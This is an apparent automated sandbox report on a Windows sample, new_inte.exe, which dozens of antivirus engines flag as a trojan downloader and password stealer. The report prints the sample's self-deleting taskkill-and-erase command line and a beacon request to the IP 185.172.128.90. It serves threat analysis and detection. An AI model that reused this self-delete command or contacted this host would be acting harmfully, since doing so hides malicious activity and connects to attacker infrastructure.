Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Jan. 14, 2024, 1:33 p.m. | Jan. 14, 2024, 1:39 p.m. |
Process | PID | Command line |
---|---|---|
cmd.exe | 2684 | "C:\Windows\System32\cmd.exe" /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
taskkill.exe | 2756 | taskkill /im "new_inte.exe" /f |

Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |

IP Address | Status | Action |
---|---|---|
185.172.128.90 | Active | Moloch |

Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Mark | Value |
---|---|
suspicious_features | Connection to IP address |
suspicious_request | GET http://185.172.128.90/cpa/ping.php?substr=one&s=two |
request | GET http://185.172.128.90/cpa/ping.php?substr=one&s=two |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
cmdline | C:\Windows\System32\cmd.exe /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
file | C:\Users\test22\AppData\Local\Temp\new_inte.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "new_inte.exe") |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
cmdline | taskkill /im "new_inte.exe" /f |
cmdline | C:\Windows\System32\cmd.exe /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
host | 185.172.128.90 |
file | C:\Users\test22\AppData\Local\Temp\new_inte.exe |

Antivirus | Result |
---|---|
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.Tepfer.i!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
Skyhigh | BehavesLike.Win32.Downloader.ch |
ALYac | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Cylance | unsafe |
VIPRE | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Sangfor | Downloader.Win32.Agent.Vjnh |
BitDefender | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Cybereason | malicious.16d3d8 |
Arcabit | Trojan.Heur.RP.E48F1C |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/TrojanDownloader.Agent.ELB |
APEX | Malicious |
McAfee | Artemis!8A6150D9AEEC |
Avast | Win32:DropperX-gen [Drp] |
Kaspersky | VHO:Trojan-PSW.Win32.Tepfer.gen |
Alibaba | TrojanDownloader:Win32/DropperX.e23371e1 |
MicroWorld-eScan | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Rising | Trojan.Generic@AI.100 (RDML:CNtgNH16DDDc1dNCY3OvUQ) |
Emsisoft | Gen:Trojan.Heur.RP.luW@bGPxNopi (B) |
F-Secure | Heuristic.HEUR/AGEN.1317762 |
TrendMicro | TROJ_GEN.R06CC0WAD24 |
Sophos | Mal/Generic-S |
Webroot | W32.Trojan.Gen |
Avira | HEUR/AGEN.1317762 |
Antiy-AVL | Trojan[Downloader]/Win32.Agent |
Kingsoft | malware.kb.a.771 |
Microsoft | Trojan:Win32/Znyonm |
ZoneAlarm | VHO:Trojan-PSW.Win32.Tepfer.gen |
GData | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Varist | W32/Agent.EPA.gen!Eldorado |
BitDefenderTheta | AI:Packer.781F2A261F |
DeepInstinct | MALICIOUS |
VBA32 | BScope.TrojanPSW.Tepfer |
Malwarebytes | Generic.Malware/Suspicious |
Tencent | Win32.Trojan-Downloader.Oader.Osmw |
SentinelOne | Static AI - Suspicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
Fortinet | W32/Agent.ELB!tr.dldr |
AVG | Win32:DropperX-gen [Drp] |
CrowdStrike | win/malicious_confidence_100% (W) |